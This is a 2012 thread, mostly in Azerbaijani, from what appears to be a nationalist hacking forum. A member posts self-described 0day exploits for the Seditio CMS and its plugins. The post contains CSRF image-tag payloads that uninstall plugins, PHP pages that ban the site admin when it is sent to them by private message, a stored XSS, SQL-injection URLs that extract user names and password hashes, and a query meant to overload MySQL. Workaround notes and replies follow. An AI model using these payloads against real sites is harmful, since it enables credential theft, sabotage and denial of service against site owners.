Anti-armenia.ORG - Forumlar - Seditio Plugins Vulns

Forumlar / Hacking Platform / Exploits & Vulnerabilities / Seditio Plugins Vulns

Istifadəçi

2012-04-12 07:31 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Salam Aleykum)
Burda seditio pluginleri,hemcinin seditio CMS 165/170 ve kohne versiyalar ucun bir sira exploitlerimizi 0day edirik.
Bu exploitler icerisinde haminin cox tanidigi pmokuma (Respect Metaizm)+T3DB TOOLS+SF-QUICKBAN üçün exploitlerdir.
Əminəm ki oxuyub başa düşərsiniz.
Onu deyim ki Kaan-nın yığdığı seditioda faktiki 2 vulnerable plugin var.
1-cisi T3 DBTOOLS kimdə o varsa təcili silsin yolunu göstərmişəm necə çünki CSRFlə bazanı pozmaq olur.
2-cisi isə SFQUİCKbandırki birinci elə admini ban eləmək olur (exploit burdadır) digər tərəfdən ise userləri.

Getdik)
======================================================================
Vulnerable software: T3 DB Tools Version 1.6 (seditio database management plugin).
Developed by : http://www.t3-design.com/t3-db-tools/ (MD5 SUM: 8ab362601793e238f504783fd9953dd4 *dbtools.rar)
======================================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
======================================================================
About software:

T3 DB Tools
T3 DB Tools is a seditio database management plugin.

Features:
– Backup all or selected tables of your seditio DB.
– Table information and schema.
– Browse tables (experimental)
– Drop, truncate tables.
– Option to export data, structure or both.
– Support for gzip, bzip2 compression of the backups.
– Restore database backup.
– Run custom sed queries.
– Extra security rights.
– Check, analyze, repair and optimize tables.
– Auto create the backup folder and the directory blocker protection.
– 100% ability to translate.
– Easy navigation and event reports.
======================================================================
Vulnerability Desc:
T3 DB Tools Version 1.6 is prone to CROSS SITE REQUEST FORGERY Vulnerability.
It uses $_GET without any tokenization when deals with DANGERIOUS truncate,drop operations on your database.
See:
http://cxsecurity.com/issue/WLB-2012040071 (seditio165 CSRF and remote access to db dump)
======================================================================

======================Workaround=======================================
A) If you found it in your administration section uninstall it immediately.
To do so:
Go to /system/core/admin/
1'st backup dbinc/ directory.(copy to your pc)
Then delete it.
2'nd
Backup admin.dbtools.inc.php toocopy to your pc)
Then Delete admin.dbtools.inc.php file too.
Or try to uninstall it from Plugins section.
Secure datas/backups directory by placing .htaccess (deny from all) or remove datas/backups/ directory.
(Do not forget backup it too.)
B) Do not install T3 DB Tools.(Otherwise one nice day it'll drop/truncate your database tables)
======================================================================

Note: (Maybe previous versions too affected but not tested)

/AkaStep ^_^

===================================================================

Uninstalling of plugins may cause data loss,functionality loss.
Seditio Tested with Seditio 165/seditio-build170.20120302 versions [Uninstall Plugins] CSRF exploit.

Kod:
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />

==============================================================================================

SF-QUICKban plugin CSRF vuln:
Can be used for Ban others:
Tested under seditio 165 from seditio-eklenti.com
http://192.168.0.15/learn/128/sed/seditio165/users.php?m=quickban&uid=1&ip=192.168.0.1

&uid parameters value can be found from users/admins profile.
&ip paramaters value can be obtained from user/admin directly (in eg: using with simply image snifer)

So our "Universal" CSRF exploit for ban Admin
(Just send link throught private message to admin and say OLA to admin.)

Kod:
<?php
error_reporting('off');
/*
4 Fun
*/

$site='http://192.168.0.15/learn/128/sed/seditio165/';// define your target site here.

$funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here

die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />'. PHP_EOL . '<h1>' . strrev($funmsg) . '</h1>');
?>

Or if the target site uses:
http://www.seditioforge.com/datas/users/1-sfquickban.rar

Our BAN ADMIN exploit.

Kod:
<?php
error_reporting('off');
//tested under sediti 165
/*
4 Fun By AkaStep
*/

$site='http://192.168.0.15/learn/128/sed/seditio.170/';// define your target site here.

$funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here

die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />'. PHP_EOL .

'<img src="' . $site . '/plug.php?e=sfquickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />' .
'<h1>' . strrev($funmsg) . '</h1>');

?>

Seditio 165/170
Info disclosure:
Try to post in inputs very long string like (Copy from Source of page all stuff and paste to inputs)

Application will expose column.names.

In eg:
Client Side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>

http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP

Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1

Persistent Cross Site Scripting and HTML CODE injection vulnerabilities still unfixed + Same Info/Path disclosures still unfixed.
.("Thanks" for TinyMCE editor and thanks to client side validation)
I notified about it here:
http://packetstormsecurity.org/files/111320/Seditio-Build-161-Cross-Site-Scripting-Information-Disclosure.html

Workaround: Do not use TinyMCE.
It is based on client side validation.
Uninstall it from plugins and use Markitup or textboxer instead.

Workaround about CSRF vulns:
Do not sit under administrative/moderator account.
Do not browse any links,url's while you are sitting under administrative account.
Revoke Ban Grants from admins,moders.
Uninstall SF-QUICK Ban plugin.
===========================================================================================

Kod:
============================================================================
Vulnerable Software: PmOS - Pm Okuma Sistemi [plugin for Seditio CMS].
http://seditio-eklenti.com/datas/users/1-pmoku.rar (MD5 SUM: 88235c2b4b0613bff87545d2d887f042 *1-pmoku.rar)
http://seditio-eklenti.com/seditio-pm-okuma-eklentisi-d46.html
============================================================================
About Software:
PmOS - Pm Okuma Sistemi [plugin for Seditio CMS]
gives ability to administrators to read anothers PM's (Private messages)
============================================================================
Tested:
With: Seditio 165

*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
============================================================================
Vuln Desc:
Due Insufficent sanitization this plugin is prone Cross Site Scripting Vulnerability(Persistent Cross Site Scripting vuln)
============================================================================

No sanitization when fetching data from database.
And thanks to Seditio cms again! It stores private message body in database without any sanitization:

===========================================================================
mysql> select * from sed_pm \G
*************************** 1. row ***************************
pm_id: 6
pm_state: 0
pm_date: 1334009749
pm_fromuserid: 1
pm_fromuser: admin
pm_touserid: 1
pm_title: <script>alert(1);</script>
pm_text: <script>alert(2);</script>
1 row in set (0.00 sec)

mysql>
===========================================================================

Due trust to this issuse pmoku plugin is vulnerable to XSS.
Vulnerable code section(From bottom: $pm_text = $row['pm_text']; will become unsanitized)
//plugins/pmoku/pmoku.admin.php
----------------------------------------Snip ------------------------------------
$sql = sed_sql_query("SELECT * FROM sed_pm ORDER by pm_date DESC LIMIT 0,50");

$plugin_body .= "<h4>".$L['editdeleteentries']." :</h4>";
$plugin_body .= "<table class=\"cells\"><tr>";
$plugin_body .= "<td class=\"coltop\">".$L['Delete']."</td>";
$plugin_body .= "<td class=\"coltop\">Tarih</td>";
$plugin_body .= "<td class=\"coltop\">Gцnderen</td>";
$plugin_body .= "<td class=\"coltop\">Konu</td>";
$plugin_body .= "<td class=\"coltop\">Mesaj</td>";
$plugin_body .= "<td class=\"coltop\">Alan</td>";
$plugin_body .= "</tr>";

while ($row = sed_sql_fetcharray($sql))
{
$pm_id = $row['pm_id'];
$pm_date = @date($cfg['dateformat'], $row['pm_date'] + $usr['timezone'] * 3600);
$pm_fromuser = $row['pm_fromuser'];
$pm_title = $row['pm_title'];
$pm_text = $row['pm_text'];
$pm_touserid = $row['pm_touserid'];
$plugin_body .= "<form id=\"saveallowlist_".$allowlist_id."\" action=\"admin.php?m=tools&p=adminallow&a=update&id=".$allowlist_id."\" method=\"post\">";
$plugin_body .= "<tr><td style=\"text-align:center;\">[<a href=\"admin.php?m=tools&p=pmoku&a=delete&id=".$pm_id."&".sed_xg()."\">x</a>]</td>";

$plugin_body .= "<td>$pm_date</td>";
$plugin_body .= "<td>$pm_fromuser</td>";
$plugin_body .= "<td>$pm_title</td>";
$plugin_body .= "<td>$pm_text</td>";
$plugin_body .= "<td>$pm_touserid</td>";
$plugin_body .= "<td><input type=\"submit\" class=\"submit\" value=\"".$L['Update']."\" /></td></tr></form>";
}
$plugin_body .= "</table>";
------------------------------EOF Snip ------------------------------------

Print screen:
http://s019.radikal.ru/i617/1204/b2/9c434fd50926.png

Special Thanks 2 MeTaiZm & 2 All AA Team.
+++++ Greetz to all ++++++
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!
]

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-04-12 10:53 GMT

MetaizM

Gold

Mesaj Sayı : 175

Mövzu Sayı :

Rep Ver :

Rep Sayı : 5

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş :

Mesaj :

speyşil mayk!
Hamsın yazıb tökmüsən day camaat seditio işlətməsin
Respect!^_^

Anti-armenia.ORG

Istifadəçi

2012-04-12 12:42 GMT

XEY

VIP

Mesaj Sayı : 33

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək : xey

Yaş :

Mesaj :

mən başqasın işlədirəm axı sfquick ban.. 1ci isə nədi bilmirəm

Step özün əncam qılarsan

No Kids No Hack

Anti-armenia.ORG

Istifadəçi

2012-04-12 14:38 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Bu da SQL injection)
0day

Kod:
============================================================
Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from:neocrome.net
(MD5 SUM:beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
===========================================================
Vuln Desc:
Seditio 170 (seditio-build170.20120302) is Prone to SQL injection vulnerability.
Note:*For successfull exploitation requires administrative authentication to system.*

//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');

if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");

Exploit:
Extract user(s)/admin(s)/moder(s) details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--

Overload MYSQL server:(As result Mysql Server Goes Down+High CPU Load in other words: Create Denial Of Service throught sql injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF especially if you have no any access to system as admin.
In eg:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />

Print screen:
http://s019.radikal.ru/i625/1204/6d/842088135393.png

Seditio 170 (seditio-build170.20120302) also prone to CSRF (Cross Site Request Forgery)
vulnerability because it doesn't checks request validity throught $_GET request
and as result we can silently Uninstall/stop/pause/start plugins which may cause:
Data loss,functionality loss.
===========================================================================================
/*Tested with Seditio 165/seditio-build170.20120302 versions [Uninstall Plugins] CSRF exploit.*/
//Works for me.
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
==============================================================================================

Information Disclosure:

Try to post in inputs very long string.

Application will expose column.names which is not acceptable anymore from security consideration.

In eg:
Client Side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>

http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP

Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1

Persistent Cross Site Scripting vulnerability still unfixed.(from Seditio 161)
Same Info/Path disclosures still unfixed.(from Seditio 161).
("Thanks" for TinyMCE editor and thanks to client side validation)(from Seditio 161)
I notified about it here+ to vendor too but it still unfixed in 170.20120302 too.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================

+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-04-12 14:47 GMT

Ferid23

Admin

Mesaj Sayı : 1875

Mövzu Sayı :

Rep Ver :

Rep Sayı : 45

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Anti-armenia.ORG

Ölkə :

Məslək : Programmer & Defacer

Yaş : 12

Mesaj :

BlackMinD və MetaizM Təbriklər! Gözəl iş çıxarmısız.
PS: Belə getsə heçkim seditio işlətmiyəcək)))

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)

Anti-armenia.ORG

Istifadəçi

2012-04-12 16:30 GMT

TheRock

Gold

Mesaj Sayı : 71

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək : xsecurity

Yaş :

Mesaj :

Bunları araştırıb o dəyərli vaxtını xərclədiyin üçün çox sağ ol.
Həmən konuya dəyinmək istəyirəm.
1. 170 versiyası daha istifadəyə verilmədi, db toolsun təhditlər yaradacağını mən özüm daha öncədən bilirdim və bu db tools əminəmki yeni versiyada olmayacaq.
2. SFQuick Ban əlavəsi, istəyə bağlı olaraq kullanımdadır.
3. PM Okuma əlavəsi, istəyə bağlı olaraq kullanımdadır. (Illa bunu işlətmək istəyirəm deyirsinizsə qısa yoldan pmoku əlavəsinin fayllarına chmod 444 verə bilərsiniz.)
4. Tapılan bu açıqların çoxunu hosting xidməti verən server üzərində test etdim və nəticədə heç bir təhditlə qarşılaşmadım, Lakin bunları apache üzərindən test etdim və gözlədiyim nəticəni aldım. Məncə ayarlanmamış Apache sistemini ayarlanmış Apache sisteminə qarışdırmayaq. Nəinki Seditio digər bütün CMS sistemlərinidə qurdalasaq çox ayınları çıxar ortaya, ancaq Step, səndə yaxşı bilirsənki Seditio sistemi digər CMS sistemlərindən daha güvənlidir. Sadəcə işlətmək üçün webmaster olacaqsan. Bura gələnlərin çoxusu sökmək dağıltmaq peşində )) Təbiki çoxusuda sizin kimi açıq tapan ustaların sayyəsində.

5. Ən son paylaşdığn sitatda Error: Title of your site 2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1 bu nəticəni ala bilmədim ancaq onun yerinə 2012-04-12 14:03 Fatal Error : Wrong parameter in the URL. belə bir nəticə ilə qarşılaşdım. Məncə burda da yenə işin içinə Apache fərqi qarışır. Yəni qısaca demək istədiyim oduki hər zaman PC də yoxladığınız, gərçək hostinglə eyni nəticəni ala bilməyə bilərsiniz.

Yenədə hər zaman səndən Seditio güvənlik haqqında yeni xəbərlər gözləyəcəm. Nə qədər belə açıqlardan xəbərimiz olsa, o qədər də sistemi etibarlı vəziyyətə gətirə biləcəyik.

AATeam | EH

Anti-armenia.ORG

Istifadəçi

2012-04-12 16:32 GMT

Dj_Taleh

Banned

Mesaj Sayı : 63

Mövzu Sayı :

Rep Ver :

Rep Sayı : 0

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş : 35

Mesaj :

Çox Sağol Qaqa

Respect +5

Anti-armenia.ORG

Istifadəçi

2012-04-12 16:52 GMT

MetaizM

Gold

Mesaj Sayı : 175

Mövzu Sayı :

Rep Ver :

Rep Sayı : 5

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş :

Mesaj :

burda nəzər yetirdim
